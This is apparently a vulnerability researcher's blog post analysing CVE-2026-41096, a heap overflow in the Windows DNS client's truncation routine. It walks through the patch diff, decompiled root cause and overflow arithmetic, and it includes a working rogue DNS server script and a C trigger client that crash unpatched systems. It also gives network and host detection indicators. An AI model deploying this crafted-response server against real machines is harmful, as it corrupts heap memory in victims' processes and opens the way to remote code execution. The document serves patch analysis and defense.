m0n1x90

CVE-2026-41096: Heap Overflow in the Windows DNS Client

I first saw CVE-2026-41096 pop up on X and the description immediately caught my attention: a heap overflow in the Windows DNS client, triggered by a single UDP response. No interaction, no auth. I wanted to understand exactly how it worked, so I pulled the patched and unpatched DLLs and started digging.

After spending some time diffing the dnsapi.dll patch, I found a pretty clean heap overflow in the DNS truncation logic. The bug is in DnsRawTruncateMessageForUdp(). When a DNS response has QDCOUNT=0, the function gets confused about what it's skipping over, and ends up writing past the end of the buffer. 604 bytes past, to be exact.

It's reachable from any process calling DnsQueryRaw, and all you need on the attacker side is a DNS response on the wire. No auth, no interaction. The MSRC advisory has the official details.

This post walks through the binary diff, the root cause from Ghidra decompilation, and a working crash PoC.

Diffing the Patch

Starting point: two builds of dnsapi.dll - one from before the patch, one after:

| Property | Unpatched | Patched |
| --- | --- | --- |
| PE symbol path | dnsapi/8FB65B3A135000 | dnsapi/D4B9BB7F135000 |
| Build version | 10.0.28000.1896 | 10.0.28000.2113 |
| File size | 1,269,760 | 1,269,864 |

I threw both through ghidriff. Out of ~3,750 functions, 99.88% matched. Only 22 had actual code changes, and out of those only two stood out:

  1. DnsRawTruncateMessageForUdp, 84% match. Function grew from 642 → 796 bytes. That's +154 bytes of new logic, clearly not just a refactor.
  2. UsageIndexProperty::Write, 42% match. Turns out it was missing the 4th argument to memcpy_s. Separate bug I guess.

The patch also pulls in a new symbol: Feature_1831057722__private_IsEnabledDeviceUsageNoInline, a WIL feature gate. Classic Microsoft pattern for rolling out fixes behind a flag so they can be reverted if something breaks.

The DNS Message Buffer

To understand the bug, you need to know how dnsapi.dll lays out DNS messages in memory. The internal DNS_MSG_BUF structure is a heap-allocated blob. The first 700 bytes are internal metadata, and the actual DNS wire packet starts at offset +0x2BC:

┌──────────────────────────────────────────┐
│  Offset 0x000 - 0x247: Internal metadata │
│  (flags, pointers, state)                │
├──────────────────────────────────────────┤
│  +0x248: cbMessageLength (uint32)        │
│  +0x250: pBufferEnd (ptr to wire end)    │
│  +0x2BA: wMessageLength (uint16)         │
├──────────────────────────────────────────┤  ← Wire format starts at +0x2BC (offset 700)
│  +0x2BC: Transaction ID    (2 bytes)     │
│  +0x2BE: Flags             (2 bytes)     │
│  +0x2C0: QDCOUNT           (2 bytes)     │  ← Key field: question count
│  +0x2C2: ANCOUNT           (2 bytes)     │
│  +0x2C4: NSCOUNT           (2 bytes)     │
│  +0x2C6: ARCOUNT           (2 bytes)     │
│  +0x2C8: Data section      (variable)    │
└──────────────────────────────────────────┘

The allocation size comes from Packet_AllocateMsgBuf(wire_size) → Dns_Allocate(max(512, wire_size) + 0x2C3). For our 623-byte crafted response, that works out to HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 1330). Remember that number.
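The sizing rule above is easy to write out as a helper. This is only a sketch of the formula as described in this post, not the actual dnsapi.dll code; the function and constant names are made up for illustration.

```python
MIN_WIRE_SIZE = 512      # floor applied to the wire size before adding overhead
MSGBUF_OVERHEAD = 0x2C3  # 707 bytes added on top of the (clamped) wire size


def msgbuf_alloc_size(wire_size: int) -> int:
    """Bytes requested from the heap for a DNS message of wire_size bytes."""
    return max(MIN_WIRE_SIZE, wire_size) + MSGBUF_OVERHEAD


print(msgbuf_alloc_size(623))  # 1330, the crafted response from this post
print(msgbuf_alloc_size(100))  # 1219, small messages are sized as if they were 512 bytes
```

Small messages always get the same 1219-byte buffer, while anything over 512 bytes gets a buffer that tracks the wire size exactly.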

The Bug

How Packet_SkipToRecord decides what to skip

Packet_SkipToRecord(wire_start, wire_end, n) walks forward past the first n entries in a DNS message. The important thing is how it decides whether each entry is a question or a resource record, because those have very different sizes:

// Ghidra decompilation — Packet_SkipToRecord (simplified)
do {
    pbVar2 = Packet_SkipPacketName(pbVar2, param_2);  // skip DNS name

    if (iVar3 < (int)(uint)*(ushort *)(param_1 + 4)) {
        // Entry index < QDCOUNT → treat as QUESTION
        // Skip: QTYPE(2) + QCLASS(2) = 4 bytes
        pbVar2 = pbVar2 + 4;
    } else {
        // Entry index >= QDCOUNT → treat as RESOURCE RECORD
        // Skip: TYPE(2) + CLASS(2) + TTL(4) + RDLEN(2) + RDATA(RDLEN)
        pbVar2 = Dns_SkipPacketRecord(pbVar2, param_2);
    }
    iVar3++;
} while (iVar3 < param_3);

The check at param_1 + 4 reads the QDCOUNT field from the DNS header. If the current index is less than QDCOUNT, the entry is a question (skip name + 4 bytes). Otherwise it's a resource record: skip the name, plus TYPE, CLASS, TTL, RDLEN, and the entire RDATA. That's a much bigger skip.

See where this is going?
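To make the size difference concrete, here is a small Python model of the skip logic described above. It is a sketch under assumptions: it works on raw big-endian wire bytes, does no bounds checking, expects n >= 1, and the helper names (skip_name, skip_to_record) are mine, not symbols from dnsapi.dll.

```python
import struct


def skip_name(wire: bytes, pos: int) -> int:
    """Skip one DNS name and return the offset of the byte after it."""
    while True:
        length = wire[pos]
        if length == 0:             # root label terminates the name
            return pos + 1
        if length & 0xC0 == 0xC0:   # a 2-byte compression pointer also ends it
            return pos + 2
        pos += 1 + length           # ordinary label: length byte + label bytes


def skip_to_record(wire: bytes, n: int) -> int:
    """Walk past the first n entries after the header, return the final offset."""
    qdcount = struct.unpack_from("!H", wire, 4)[0]
    pos = 12                        # entries start right after the 12-byte header
    for index in range(n):
        pos = skip_name(wire, pos)
        if index < qdcount:
            pos += 4                # question: QTYPE(2) + QCLASS(2)
        else:
            rdlen = struct.unpack_from("!H", wire, pos + 8)[0]
            pos += 10 + rdlen       # RR: TYPE, CLASS, TTL, RDLEN, then RDATA
    return pos


opt = b"\x00" + struct.pack("!HHIH", 41, 4096, 0, 600) + b"A" * 600
question = b"\x01a\x04test\x00" + struct.pack("!HH", 1, 1)

normal = struct.pack("!6H", 1, 0x8180, 1, 0, 0, 1) + question + opt
crafted = struct.pack("!6H", 1, 0x8180, 0, 0, 0, 1) + opt

print(skip_to_record(normal, 1))   # 24: header + 8-byte name + 4
print(skip_to_record(crafted, 1))  # 623: the whole OPT record was skipped
```

With a question present the returned offset sits just past the question. With QDCOUNT=0 the same call returns the end of the packet.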

The vulnerable function

Here's the unpatched DnsRawTruncateMessageForUdp, stripped of WPP tracing:

undefined4 DnsRawTruncateMessageForUdp(byte *param_1, uint param_2, undefined4 *param_3)
{
    byte *_Dst;

    // Step 1: Skip first entry to find where to place the truncated payload
    _Dst = Packet_SkipToRecord(param_1 + 700,       // wire data start
                               *(param_1 + 0x250),   // wire data end
                               1);                    // skip exactly 1 entry

    // Step 2: Locate the OPT record (EDNS)
    uVar2 = DnsRawFindOptRecord(param_1, &local_50, local_54);

    if (uVar2 != 0) {
        // Step 3: Copy OPT record to _Dst
        memmove(_Dst, local_50, local_54[0]);   // ← OVERFLOW HERE
        _Dst = _Dst + local_54[0];
    }

    // Step 4: Validate truncated size (TOO LATE — memmove already executed)
    pbVar1 = _Dst + (-700 - (longlong)param_1);  // new message length
    if ((ulonglong)param_2 < pbVar1) {
        return 0x251e;  // DNS_ERROR_BAD_PACKET
    }
    // ...
}

Here's what happens when QDCOUNT == 0:

In the normal case (QDCOUNT ≥ 1), entry 0 is a question. Packet_SkipToRecord skips the DNS name + 4 bytes, and _Dst lands right after the question section. Plenty of room. The memmove copies the OPT record there, no problem.

But when QDCOUNT == 0, entry 0 isn't a question anymore. Packet_SkipToRecord goes down the resource record path and calls Dns_SkipPacketRecord, which skips the entire OPT record: name, TYPE, CLASS, TTL, RDLEN, and all 600 bytes of RDATA. Now _Dst points to the end of the wire data, right at the edge of the heap allocation.

Then the function copies the OPT record (611 bytes) to that location. The allocation is 1330 bytes, _Dst is at offset 1323. Do the math: 611 bytes written, 7 bytes of space. 604 bytes overflow into whatever's next on the heap.

The real kicker? There IS a bounds check, but it runs after the memmove. The damage is already done.

Overflow Math

Let's be precise about the sizes. The crafted response has QDCOUNT=0, ANCOUNT=0, NSCOUNT=0, ARCOUNT=1 with a single OPT record:

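| Component | Size | Cumulative |
| --- | --- | --- |
| DNS Header | 12 bytes | 12 |
| OPT name (root .) | 1 byte | 13 |
| OPT TYPE (41) | 2 bytes | 15 |
| OPT CLASS (UDP size) | 2 bytes | 17 |
| OPT TTL (extended RCODE) | 4 bytes | 21 |
| OPT RDLEN | 2 bytes | 23 |
| OPT RDATA | 600 bytes | 623 |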

MsgBuf allocation: max(512, 623) + 0x2C3 = 623 + 707 = 1330 bytes

Wire data placement: Starts at MsgBuf+700. Wire data occupies bytes 700–1322 (623 bytes). The allocation's last valid byte is 1329, so only bytes 1323–1329 are left over.

_Dst calculation (QDCOUNT=0): Packet_SkipToRecord skips the OPT as a full RR → _Dst = MsgBuf + 700 + 623 = MsgBuf + 1323

memmove writes: 611 bytes (OPT record without the DNS header) starting at MsgBuf+1323. Only 7 bytes remain before the allocation boundary.

Overflow = 611 - 7 = 604 bytes
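The same arithmetic can be parameterized on RDLEN to see how the attacker dials the overflow size. This is a sketch built only from the numbers in this section and assumes the single-OPT, QDCOUNT=0 layout of the PoC; overflow_bytes is a hypothetical helper name.

```python
HEADER_LEN = 12
OPT_FIXED_LEN = 11       # root name (1) + TYPE (2) + CLASS (2) + TTL (4) + RDLEN (2)
WIRE_OFFSET = 700        # 0x2BC, where the wire packet starts in the buffer
ALLOC_OVERHEAD = 0x2C3   # 707


def overflow_bytes(rdlen: int) -> int:
    """Bytes written past the allocation for a lone OPT record with this RDLEN."""
    opt_len = OPT_FIXED_LEN + rdlen
    wire_len = HEADER_LEN + opt_len
    alloc = max(512, wire_len) + ALLOC_OVERHEAD
    dst = WIRE_OFFSET + wire_len   # QDCOUNT=0: destination lands at the end of the wire data
    room = alloc - dst             # bytes left before the allocation boundary
    return max(0, opt_len - room)


print(overflow_bytes(600))  # 604, matching the figure above
print(overflow_bytes(490))  # 494
```

For any response over 512 bytes the room left is always 1330 - 1323 = 7 bytes in general form (wire_len + 707 - 700 - wire_len), so the overflow works out to RDLEN + 4.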

The attacker fully controls the OPT record content that gets copied: both the TTL field (4 bytes) and the RDATA payload. In the PoC I just fill everything with 0x41 so it's easy to spot in a debugger.

What the Patch Does

The fix adds three separate changes, all behind that Feature_1831057722 gate. Here's the interesting part: either of the first two would have stopped this overflow on its own, but Microsoft went belt-and-suspenders.

Fix 1: Don't call Packet_SkipToRecord when QDCOUNT is zero

// PATCHED — Ghidra decompilation (simplified)
uVar2 = Feature_1831057722__private_IsEnabledDeviceUsageNoInline();
if (uVar2 == 0) {
    // Legacy path (feature gate not enabled)
    _Dst = Packet_SkipToRecord(param_1 + 700, *(param_1 + 0x250), 1);
} else {
    uVar3 = *(ushort *)(param_1 + 0x2c0);   // Read QDCOUNT
    if (uVar3 != 0) {
        // Has questions → safe to call Packet_SkipToRecord
        goto LAB_SkipToRecord;
    }
    // QDCOUNT == 0 → bypass Packet_SkipToRecord entirely
    // Set _Dst to the start of the data section (just after the 12-byte header)
    _Dst = (byte *)(param_1 + 0x2c8);
}

This is the real fix. When QDCOUNT == 0, skip the Packet_SkipToRecord call entirely and just set _Dst to the data section start (+0x2C8). No confusion, no overshoot.

Fix 2: Sanity check, reject if OPT is before destination

uVar2 = DnsRawFindOptRecord(param_1, &local_48, local_50);
if (uVar2 != 0) {
    uVar2 = Feature_1831057722__private_IsEnabledDeviceUsageNoInline();
    if ((uVar2 != 0) && (local_48 < _Dst)) {
        // OPT record is BEFORE _Dst → invalid state → reject
        return 0x251e;  // DNS_ERROR_BAD_PACKET
    }
    memmove(_Dst, local_48, local_50[0]);  // Safe: OPT is at or after _Dst
}

Even if _Dst somehow ends up wrong, don't let the copy proceed if the source (OPT record) is before the destination. That condition should never happen in a well-formed message, so bail out with DNS_ERROR_BAD_PACKET.
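Fix 1 and Fix 2 can be modeled side by side to see that each one blocks the crafted packet independently. This is a simplified sketch, not the patched code: offsets are relative to the start of the wire data (so the data section starts at 12), and pick_dst and copy_allowed are names invented for the example.

```python
HEADER_LEN = 12  # data section starts right after the DNS header


def pick_dst(qdcount: int, skipped_to: int, gate_on: bool) -> int:
    """Fix 1: with the gate on and QDCOUNT == 0, ignore the skip result."""
    if gate_on and qdcount == 0:
        return HEADER_LEN
    return skipped_to


def copy_allowed(opt_offset: int, dst: int, gate_on: bool) -> bool:
    """Fix 2: refuse the copy when the OPT record sits before the destination."""
    return not (gate_on and opt_offset < dst)


# Crafted packet: OPT record at offset 12, the skip routine overshoots to 623.
print(pick_dst(0, 623, gate_on=False))      # 623
print(pick_dst(0, 623, gate_on=True))       # 12
print(copy_allowed(12, 623, gate_on=True))  # False
```

With only Fix 1 the destination never leaves the data section. With only Fix 2 the overshot destination is still computed, but the copy is refused because the OPT record at offset 12 is before it.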

Fix 3: Don't lie about QDCOUNT in the truncated header

// When writing truncated header counts:
uVar2 = Feature_1831057722__private_IsEnabledDeviceUsageNoInline();
if (uVar2 == 0) {
    uVar5 = 1;  // Old: always force QDCOUNT to 1
}
// New: preserve original QDCOUNT value (0 stays 0)
*(undefined2 *)(param_1 + 0x2c0) = uVar5;

The old code always forced QDCOUNT to 1 in the truncated output, even if the original was 0. The patch preserves the original value. This one's more about correctness than security, but it rounds out the fix.

The PoC

Two pieces: a rogue DNS server (Python, runs anywhere) and a trigger client (C, runs on vulnerable Windows 11).

Rogue DNS Server

Nothing fancy, listens on UDP 53 and replies to every query with the crafted QDCOUNT=0 + OPT response:

#!/usr/bin/env python3
"""
CVE-2026-41096 — Rogue DNS Server

Replies to every DNS query with a crafted QDCOUNT=0 + OPT response
that triggers a heap overflow in DnsRawTruncateMessageForUdp().
"""
import socket, struct, sys

RDATA_SIZE = 600  # OPT RDATA bytes (must make total response > 512)


def response(txid):
    #                           QDCOUNT=0  ANCOUNT=0  NSCOUNT=0  ARCOUNT=1
    hdr = struct.pack("!6H", txid, 0x8180, 0, 0, 0, 1)
    #       root name  TYPE=OPT(41)  CLASS=4096  TTL=0x41414141  RDLEN
    opt = (b"\x00"
           + struct.pack("!HHIH", 41, 4096, 0x41414141, RDATA_SIZE)
           + b"\x41" * RDATA_SIZE)
    return hdr + opt


sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("0.0.0.0", 53))

total = 12 + 11 + RDATA_SIZE
print(f"[*] CVE-2026-41096 rogue DNS — :53  ({total}B response, RDATA={RDATA_SIZE})")

try:
    while True:
        data, addr = sock.recvfrom(512)
        if len(data) < 12:
            continue
        txid = struct.unpack("!H", data[:2])[0]
        r = response(txid)
        sock.sendto(r, addr)
        print(f"[+] {addr[0]}:{addr[1]}  TXID=0x{txid:04X}  ->  {len(r)}B sent")
except KeyboardInterrupt:
    print("\n[*] Stopped.")
finally:
    sock.close()

Anatomy of the malicious response (623 bytes):

 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|         Transaction ID        |     Flags: 0x8180 (QR=1,     |  Bytes 0-3
|                               |      RD=1, RA=1, RCODE=0)    |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|       QDCOUNT = 0x0000        |       ANCOUNT = 0x0000        |  Bytes 4-7
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|       NSCOUNT = 0x0000        |       ARCOUNT = 0x0001        |  Bytes 8-11
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Name: 0x00    |    TYPE = 41 (OPT)    |    CLASS = 4096       |  Bytes 12-16
| (root domain) |                       |    (UDP payload size) |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|           TTL = 0x41414141            |     RDLEN = 600       |  Bytes 17-22
|       (extended RCODE + flags)        |                       |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                                                               |
|                   RDATA: 600 × 0x41 ('A')                     |  Bytes 23-622
|                   (attacker-controlled)                       |
|                                                               |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

The critical elements are:

  • QDCOUNT = 0: triggers the Packet_SkipToRecord bug
  • Total size (623 bytes) > 512: triggers the truncation code path
  • Large OPT RDATA: controls the overflow size and content
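If you change RDATA_SIZE or the header fields, it helps to confirm the packet still meets all three conditions before sending it. A minimal checker might look like this; it rebuilds the response with the same layout as the server above and assumes the OPT record is the first and only record. The function names are illustrative.

```python
import struct


def build_response(txid: int, rdata_size: int = 600) -> bytes:
    """Same layout as the rogue server: header with QDCOUNT=0, then one OPT record."""
    hdr = struct.pack("!6H", txid, 0x8180, 0, 0, 0, 1)
    opt = (b"\x00"
           + struct.pack("!HHIH", 41, 4096, 0x41414141, rdata_size)
           + b"\x41" * rdata_size)
    return hdr + opt


def check_trigger_conditions(pkt: bytes) -> dict:
    """Report which of the trigger conditions a candidate response satisfies."""
    if len(pkt) < 23:
        raise ValueError("too short to hold a header plus an OPT record")
    _txid, _flags, qdcount, _an, _ns, _ar = struct.unpack_from("!6H", pkt, 0)
    rtype, _cls, _ttl, rdlen = struct.unpack_from("!HHIH", pkt, 13)
    return {
        "qdcount_zero": qdcount == 0,
        "over_512": len(pkt) > 512,
        "opt_first": pkt[12] == 0 and rtype == 41,
        "rdlen_matches": 23 + rdlen == len(pkt),
    }


print(check_trigger_conditions(build_response(0x1234)))
```

Dropping rdata_size to something like 100 flips over_512 to False, which means the response would not go down the truncation path at all.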

Trigger Client

The client calls DnsQueryRaw pointed at the rogue server. It uses GetProcAddress since DnsQueryRaw isn't in older SDKs. The crash handler catches the heap corruption on the callback thread:

/*
 * CVE-2026-41096 - DnsQueryRaw Heap Overflow Trigger
 *
 * Build:  cl /W4 /O2 trigger_client.c /link ws2_32.lib
 * Usage:  trigger_client.exe <ROGUE_DNS_IP>
 * Exit:   0 = no crash (see printed verdict), 1 = error, 2 = crash (vulnerable)
 */
#define WIN32_LEAN_AND_MEAN
#include <winsock2.h>
#include <ws2tcpip.h>
#include <windows.h>
#include <windns.h>
#include <stdio.h>
#include <stdlib.h>

#pragma comment(lib, "ws2_32.lib")

typedef DNS_STATUS (WINAPI *pfnDnsQueryRaw)(
    DNS_QUERY_RAW_REQUEST *, DNS_QUERY_RAW_CANCEL *);
typedef void (WINAPI *pfnDnsQueryRawResultFree)(DNS_QUERY_RAW_RESULT *);

static HANDLE g_hEvent;
static DNS_QUERY_RAW_RESULT *g_pResult;
static volatile LONG g_callbackFired;

/* Catches the crash on the RPC callback thread */
static LONG WINAPI CrashFilter(EXCEPTION_POINTERS *ep)
{
    DWORD code = ep->ExceptionRecord->ExceptionCode;
    printf("\n[!!] CRASH — Exception 0x%08X at %p\n",
           code, ep->ExceptionRecord->ExceptionAddress);
    if (code == EXCEPTION_ACCESS_VIOLATION)
        printf("[!!] %s at 0x%llX\n",
               ep->ExceptionRecord->ExceptionInformation[0] ? "WRITE" : "READ",
               (unsigned long long)ep->ExceptionRecord->ExceptionInformation[1]);
    printf("\n[!!] CVE-2026-41096 CONFIRMED — heap overflow triggered.\n");
    fflush(stdout);
    TerminateProcess(GetCurrentProcess(), 2);
    return EXCEPTION_EXECUTE_HANDLER;
}

static void CALLBACK CompletionCb(PVOID ctx, DNS_QUERY_RAW_RESULT *r)
{
    (void)ctx;
    g_pResult = r;
    InterlockedExchange(&g_callbackFired, 1);
    SetEvent(g_hEvent);
}

int main(int argc, char *argv[])
{
    if (argc < 2) {
        fprintf(stderr, "Usage: %s <ROGUE_DNS_IP>\n", argv[0]);
        return 1;
    }

    SetUnhandledExceptionFilter(CrashFilter);

    WSADATA wsa;
    WSAStartup(MAKEWORD(2, 2), &wsa);

    HMODULE hDns = LoadLibraryW(L"dnsapi.dll");
    if (!hDns) {
        /* GetProcAddress must not be called with a NULL module handle */
        fprintf(stderr, "[-] LoadLibraryW(dnsapi.dll) failed: %lu\n", GetLastError());
        return 1;
    }
    pfnDnsQueryRaw pDnsQueryRaw =
        (pfnDnsQueryRaw)GetProcAddress(hDns, "DnsQueryRaw");
    pfnDnsQueryRawResultFree pFreeResult =
        (pfnDnsQueryRawResultFree)GetProcAddress(hDns, "DnsQueryRawResultFree");

    if (!pDnsQueryRaw) {
        fprintf(stderr, "[-] DnsQueryRaw not found (requires Win11 22H2+)\n");
        return 1;
    }

    /* Point at the rogue DNS server */
    DNS_CUSTOM_SERVER srv = {0};
    srv.dwServerType = DNS_CUSTOM_SERVER_TYPE_UDP;
    struct sockaddr_in *sa = (struct sockaddr_in *)srv.MaxSa;
    sa->sin_family = AF_INET;
    inet_pton(AF_INET, argv[1], &sa->sin_addr);

    g_hEvent = CreateEventW(NULL, TRUE, FALSE, NULL);

    DNS_QUERY_RAW_REQUEST req = {0};
    DNS_QUERY_RAW_CANCEL  can = {0};
    req.version                  = DNS_QUERY_RAW_REQUEST_VERSION1;
    req.resultsVersion           = DNS_QUERY_RAW_RESULTS_VERSION1;
    req.dnsQueryName             = L"trigger.cve202641096.test";
    req.dnsQueryType             = DNS_TYPE_A;
    req.queryCompletionCallback  = CompletionCb;
    req.queryContext             = (PVOID)1;
    req.queryRawOptions          = DNS_QUERY_RAW_OPTION_BEST_EFFORT_PARSE;
    req.customServersSize        = 1;
    req.customServers            = &srv;
    req.protocol                 = DNS_PROTOCOL_UDP;

    printf("[*] Querying rogue server %s:53 via DnsQueryRaw...\n", argv[1]);
    DNS_STATUS st = pDnsQueryRaw(&req, &can);

    if (st != 0 && st != 9506 /* DNS_REQUEST_PENDING */) {
        printf("[-] DnsQueryRaw failed: 0x%X\n", (unsigned)st);
        return 1;
    }

    printf("[*] Waiting for response...\n");
    WaitForSingleObject(g_hEvent, 15000);

    if (g_callbackFired && g_pResult) {
        DNS_STATUS qs = g_pResult->queryStatus;
        printf("[+] Callback: queryStatus=0x%X\n", (unsigned)qs);

        if (qs == 0x251E)
            printf("[+] DNS_ERROR_BAD_PACKET — system is PATCHED.\n");
        else
            printf("[!] Heap overflow occurred silently — VULNERABLE.\n");

        if (pFreeResult) pFreeResult(g_pResult);
    }

    CloseHandle(g_hEvent);
    FreeLibrary(hDns);
    WSACleanup();
    return 0;
}

Call Chain

The interesting thing is that the crash doesn't happen on the main thread. DnsQueryRaw is async, so the response comes back on an RPC callback thread inside dnsapi.dll, and that is where the overflow fires.

Reproducing the Crash

I tested this on a Windows 11 Pro 23H2 VM (build 22631.6199, dnsapi.dll 10.0.22621.5262) with the rogue server running on the host.

Setup:

# Attacker: start the rogue server (needs root for port 53)
sudo python3 rogue_dns_server.py

:: Victim: build and run
cl /W4 /O2 trigger_client.c /link ws2_32.lib
trigger_client.exe 192.168.56.1

Tip: enable Page Heap (gflags /p /enable trigger_client.exe /full) if you want a clean access violation instead of delayed STATUS_HEAP_CORRUPTION.

What I got with Page Heap:

[*] Querying rogue server 192.168.56.1:53 via DnsQueryRaw...
[*] Waiting for response...

[!!] CRASH — Exception 0xC0000005 at 0x00007FFD1A2B4F20
[!!] WRITE at 0x000001A33C3B1000

[!!] CVE-2026-41096 CONFIRMED — heap overflow triggered.

The access violation fires inside memmove. Page Heap placed a guard page right after the 1330-byte allocation, so the write hits it immediately.

Without Page Heap you get STATUS_HEAP_CORRUPTION (0xC0000374) instead. The Segment Heap notices the metadata damage on a later heap operation:

[*] Querying rogue server 192.168.56.1:53 via DnsQueryRaw...
[*] Waiting for response...

[!!] CRASH — Exception 0xC0000374 at 0x00007FFD1B5DXXXX
[!!] CVE-2026-41096 CONFIRMED — heap overflow triggered.

STATUS_HEAP_CORRUPTION: the Segment Heap caught it, but by then the overflow already happened.

On a patched system you just get a clean error:

[*] Querying rogue server 192.168.56.1:53 via DnsQueryRaw...
[*] Waiting for response...
[+] Callback: queryStatus=0x251E
[+] DNS_ERROR_BAD_PACKET — system is PATCHED.

The QDCOUNT=0 guard kicks in, no memmove executed, DNS_ERROR_BAD_PACKET returned cleanly.

Exploitability Notes

A few things that make this interesting from an exploitation perspective:

Full control over overflow content. The attacker controls both the size (via RDLEN) and content (via OPT TTL + RDATA) of the overflow. You can write arbitrary bytes into whatever's adjacent on the heap.

Heap layout on Windows 11. GetProcessHeap() uses Segment Heap. The 1330-byte allocation lands in the Variable Size (VS) bucket. Adjacent objects could be other DNS buffers, app-specific allocations, vtable pointers. Depends on the target process.

What the mitigations actually do:

| Mitigation | Does it help? |
| --- | --- |
| ASLR | No, overflow is relative to adjacent heap objects |
| CFG | Blocks calling corrupted function pointers, but doesn't prevent the write |
| Page Heap | Turns silent corruption into immediate crash (detection only) |
| Segment Heap checks | Catches it eventually, but there's a window between overflow and detection |

Detection

Network side: The trigger is a DNS response with QDCOUNT=0. Legitimate DNS servers almost always echo the question section back (QDCOUNT >= 1), so this is a strong indicator. Any IDS/network monitor that can inspect DNS headers should flag responses where bytes 4-5 (QDCOUNT) are zero and bytes 10-11 (ARCOUNT) are non-zero (indicating an OPT record in Additional).
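The header check described above fits in a few lines. This is a sketch of the heuristic only: it looks at the 12-byte header of a UDP payload you have already captured, it does not confirm that the additional record is actually an OPT, and the function name is hypothetical.

```python
import struct


def is_suspicious_dns_response(payload: bytes) -> bool:
    """Flag DNS responses with QDCOUNT == 0 and a non-zero ARCOUNT."""
    if len(payload) < 12:
        return False                      # not even a full DNS header
    _txid, flags, qdcount, _an, _ns, arcount = struct.unpack_from("!6H", payload, 0)
    is_response = bool(flags & 0x8000)    # QR bit set means response
    return is_response and qdcount == 0 and arcount != 0


crafted_hdr = struct.pack("!6H", 0x1234, 0x8180, 0, 0, 0, 1)
normal_hdr = struct.pack("!6H", 0x1234, 0x8180, 1, 1, 0, 1)
print(is_suspicious_dns_response(crafted_hdr))  # True
print(is_suspicious_dns_response(normal_hdr))   # False
```

Since this only inspects fixed offsets, it is cheap enough to run on every port 53 response. Expect to tune it against whatever unusual but legitimate traffic exists on your network.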

Host side:

  • Process crash with faulting module dnsapi.dll, exception 0xC0000005 (access violation) or 0xC0000374 (heap corruption), and DnsRawTruncateMessageForUdp on the call stack
  • On patched systems, DNS_ERROR_BAD_PACKET (0x251E) shows up in ETW traces under the Microsoft-Windows-DNS-Client provider
  • Version check: dnsapi.dll <= 10.0.28000.1896 is vulnerable
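For the version check, comparing the four-part file version as a tuple avoids string-comparison mistakes. This is a rough sketch: the threshold is the unpatched build from the diff table in this post, how you obtain the file version string is left out, and builds on other servicing branches may need their own thresholds, which this helper does not know about.

```python
LAST_VULNERABLE = (10, 0, 28000, 1896)  # unpatched dnsapi.dll build from the diff


def parse_version(text: str) -> tuple:
    """Turn '10.0.28000.1896' into (10, 0, 28000, 1896)."""
    return tuple(int(part) for part in text.split("."))


def looks_vulnerable(file_version: str) -> bool:
    """True when the version is at or below the last known vulnerable build."""
    return parse_version(file_version) <= LAST_VULNERABLE


print(looks_vulnerable("10.0.28000.1896"))  # True
print(looks_vulnerable("10.0.28000.2113"))  # False
```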

Wrapping Up

This is a pretty clean type confusion bug at its core. Packet_SkipToRecord looks at a single header field, QDCOUNT, to decide how to parse the data that follows. The attacker sets that field to zero, and suddenly a 4-byte skip becomes a 600+ byte skip. The destination pointer overshoots, memmove writes into the next heap allocation, and you've got a 604-byte overflow with fully controlled content.

The patch is solid. Three independent changes, and either of the first two guards would have been sufficient on its own. The feature gate lets them roll it back if needed.

Patch your systems. If you want to detect exploitation attempts on the network, QDCOUNT=0 in DNS responses is the signal.

PoC source (rogue server + trigger client) is in my GitHub repo.